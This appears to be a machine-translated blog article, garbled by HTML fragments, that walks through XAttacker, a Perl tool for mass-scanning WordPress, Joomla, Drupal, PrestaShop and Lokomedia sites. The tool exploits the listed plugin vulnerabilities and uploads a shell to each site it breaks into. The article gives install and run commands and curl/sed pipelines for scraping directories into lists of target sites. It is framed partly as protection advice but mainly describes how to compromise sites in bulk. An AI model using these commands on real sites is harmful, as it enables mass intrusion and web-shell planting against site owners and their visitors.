Ways to hack into popular CMS WordPress, Joomla, DruPal, etc.

From an attacker’s point of view, the site engines are no different from other services and services. Their source code is usually in the public domain, and any researcher can analyze it for errors, including security holes. Therefore, sites on a CMS rarely fall victim to a targeted attack. More often than not, they are broken in bulk.

 

Hacking sites is one of the most common types of attacks. If you are interested in how sites are hacked and what you need to look at to protect your resource, this article is for you. By structure, sites are divided into three large classes:

  • Selfwritten (made manually in HTML, produced by a static generator of type Jekyll or built in a constructor program of type Adobe Dreamweaver);
  • made in online constructors (mainly business cards without any databases and transmitted fields);
  • .

    working on ready-made CMS (Content Management System).

There are still homemade CMS, created for a particular site, but it has now become a rarity – to afford the support of its system can only the largest resources, and to justify the associated costs are not easy.

Hacking

.
Small manual on using the program XAttacker. Since the program is designed to check a large number of sites, I will also show examples of compiling lists of sites. XAttacker can search for sites by dorck (via Bing) or work with your list of sites, then automatically detects the CMS of each site and checks for popular vulnerabilities. Supported content management systems: WordPress, Joomla, DruPal, PrestaShop and Lokomedia. If a vulnerability is found, the shell is uploaded to the site.



Since the checks are fully automated and the list of known vulnerabilities is limited, the most obvious use of the program is:

.

  • check target site when time is short
  • check a large number of sites for vulnerabilities

 



/></p><p>The program is aware of such vulnerabilities as:</p><p><strong>[1] WordPress :</strong></p><ul><li>[+] Adblock Blocker</li><li>[+] WP All Import</li><li>[+] Blaze</li><li>[+] Catpro</li><li>[+] Cherry Plugin</li><li>[+] Download Manager</li><li>[+] Formcraft</li><li>[+] levoslideshow</li><li>[+] Power Zoomer</li><li>[+] Gravity Forms</li><li>[+] Revslider Upload Shell</li><li>[+] Revslider Dafece Ajax</li><li>[+] Revslider Get Config</li><li>[+] Showbiz</li><li>[+] Simple Ads Manager</li><li>[+] Slide Show Pro</li><li>[+] WP Mobile Detector</li><li>[+] Wysija</li><li>[+] InBoundio Marketing</li><li>[+] dzs-zoomsounds</li><li>[+] Reflex Gallery</li><li>[+] Creative Contact Form</li><li>[+] Work The Flow File Upload</li><li>[+] WP Job Manger</li><li>[+] PHP Event Calendar</li><li>[+] Synoptic</li><li>[+] Wp Shop</li><li>[+] Content Injection</li><li>[+] Cubed Theme NEW</li><li>[+] Rightnow Theme NEW</li><li>[+] Konzept NEW</li><li>[+] Omni Secure Files NEW</li><li>[+] Pitchprint NEW</li><li>[+] Satoshi NEW</li><li>[+] Pinboard NEW</li><li>[+] Barclaycart NEW</li></ul><p><strong>[2] Joomla</strong></p><ul><li>[+] Com Jce</li><li>[+] Com Media</li><li>[+] Com Jdownloads</li><li>[+] Com Fabrik</li><li>[+] Com Jdownloads Index</li><li>[+] Com Foxcontact</li><li>[+] Com Ads Manager</li><li>[+] Com Blog</li><li>[+] Com Users</li><li>[+] Com Weblinks</li><li>[+] mod_simplefileupload</li><li>[+] Com Facileforms NEW</li><li>[+] Com Jwallpapers NEW</li><li>[+] Com Extplorer NEW</li><li>[+] Com Rokdownloads NEW</li><li>[+] Com Sexycontactform NEW</li><li>[+] Com Jbcatalog NEW</li></ul><p><strong>[3] DruPal</strong></p><ul><li>[+] Add Admin</li><li>[+] Drupalgeddon NEW</li></ul><p><strong>[4] PrestaShop</strong></p><ul><li>[+] columnadverts</li><li>[+] soopamobile</li><li>[+] soopabanners</li><li>[+] Vtermslideshow</li><li>[+] simpleslideshow</li><li>[+] productpageadverts</li><li>[+] homepageadvertise</li><li>[+] homepageadvertise2</li><li>[+] jro_homepageadvertise</li><li>[+] attributewizardpro</li><li>[+] 1attributewizardpro</li><li>[+] AttributewizardproOLD</li><li>[+] attributewizardpro_x</li><li>[+] advancedslider</li><li>[+] cartabandonmentpro</li><li>[+] cartabandonmentproOld</li><li>[+] videostab</li><li>[+] wg24themeadministration</li><li>[+] fieldvmegamenu</li><li>[+] wdoptionpanel</li><li>[+] pk_flexmenu</li><li>[+] pk_vertflexmenu</li><li>[+] nvn_export_orders</li><li>[+] megamenu</li><li>[+] tdpsthemeoptionpanel</li><li>[+] psmodthemeoptionpanel</li><li>[+] masseditproduct</li><li>[+] blocktestimonial NEW</li></ul><p><strong>[5] Lokomedia</strong></p><ul><li>SQL injection</li></ul><h3 id=Mass check and exploitation of vulnerabilities on WordPress, Joomla, DruPal, PrestaShop and Lokomedia sites

To install the program:

git clone //github.com/Moham3dRiahi/XAttacker cd XAttacker/

Can be run without options:

perl XAttacker.pl

Then the program will print out:

[+] You Have List Of Sites

[1] Yes

[2] No

[-] Choose :

 

/></p><p>The question here is, do we have a list of sites? If we answer Yes (we need to enter number 1), then we will need to specify the path to the file. The format of this file: one site per line, you must specify the protocol http or https.</p><p>If we answer No (digit 2), then the menu will appear:</p><blockquote><p>[1] Bing Doker |> Here You Chose Da Country Dat U Want</p></blockquote><blockquote><p>[2] Bing Dorker |> Here I Will Grab Using Ur Dork World Wide Country Websites</p></blockquote><blockquote><p>[3] Mass Site Grab |> By Ip or Websites List</p></blockquote><blockquote><p>[4] Mass Site Grab |> Range Ip by Ip or Website list</p></blockquote><p>.</p><blockquote><p>[+] Choose Number :</p></blockquote><p> </p><p id=/></p><p>The options are as follows:</p><p>1. Search by dormitory sites of a certain country</p><p>2. Search by dormitory sites of any country</p><p>3. mass collection of sites by IP or list of sites</p><p>4. Mass collection of sites by IP range or list of sites</p><p>In the third and fourth case, sites must be specified without protocol, that is, without http and https.</p><p>I am more interested in the possibility of checking already prepared a large number of sites.</p><p>To do this, run the program with option <strong>-l</strong>, after which specify the file name with the list of sites to be checked:</p><pre spellcheck=perl XAttacker.pl -l list.txt

In this list, sites must be listed with the protocol (http or https).

The program will check them all in turn, show the found vulnerabilities and load the shell if it is successfully exploited.

Also all vulnerable sites will be listed with the found vulnerability in file Result/vulntargets.txt.

How to make lists of websites

.
The easiest way to get lists is to parse pages that list many sites. These can be directories, search results, different aggregators and so on.

For example, parsing sites from a popular directory:

curl -s //top.mail.ru/Rating/Computers-Programming/Today/Visitors/{1...60}.html | grep -E '><a class="t90. *</a>' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//' > prog.txt.

Note that the construction {1…60}, which in Bash means the output of a sequence of characters, in this case from 1 to 60, which means that the sites will be collected from the first sixty pages of the directory.

Another example:

echo"//`curl -s //top.mail.ru/Rating/Job/Today/Visitors/{1...60}.html | grep -E '><a class="t90.*</a>' | grep -E -v '[. ]html' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//'`' > biz.txt.

Even larger lists of sites can be obtained, for example, for the shared hosting IP using this service. However, there are sites displayed without protocol, so the following command must be executed for the resulting list:

sed -i -e 's/^/\/\//' list.txt.

As a result, the initial line “//” will be added for each site in the list.

Exclusion

.
XAttacker is very easy to use, but new vulnerabilities have not been added for quite some time, so in order for it to produce a positive result you need to check a really large number of sites.

Either, to significantly improve the results, you need to search through dortices specially selected for the vulnerabilities that this program supports – but it requires additional intellectual effort.

 

Source: //kali.org.ru/


92 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: